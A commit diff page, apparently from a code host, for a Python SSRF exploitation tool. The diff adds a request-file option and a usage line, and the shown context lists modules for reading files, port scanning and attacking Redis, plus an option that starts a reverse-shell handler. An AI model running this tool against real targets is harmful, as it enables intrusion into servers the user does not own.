|
30 | 30 | python3 ssrf-exploit.py -u https://example.com/ -m readfiles --rfile
|
31 | 31 | python3 ssrf-exploit.py -u https://example.com/ -m portscan --ssl --uagent "SSRFexploitAgent"
|
32 | 32 | python3 ssrf-exploit.py -u https://example.com/ -m redis --lhost=127.0.0.1 --lport=8080 -l 8080
|
| 33 | +python3 ssrf-exploit.py -d data/request.txt -u https://example.com/ -m redis |
33 | 34 |
|
34 | 35 | '''
|
35 | 36 | parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
36 | 37 | parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
|
37 | 38 | parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
|
38 | 39 | parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
|
39 | 40 | parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
|
| 41 | +parser.add_argument("--data", "-d", action="store", dest="reqfile", help="SSRF Request File") |
40 | 42 | parser.add_argument("--moudle", "-m", action="store", dest="moudles", help="SSRF Moudles to enable")
|
41 | 43 | parser.add_argument("--handler", "-l", action="store", dest="handler", help="Start an handler for a reverse shell" )
|
42 | 44 | parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
|
@@ -475,3 +477,4 @@ def main():
|
475 | 477 |
|
476 | 478 | logging.addLevelName( logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
|
477 | 479 | logging.addLevelName( logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
|
| 480 | + |
0 commit comments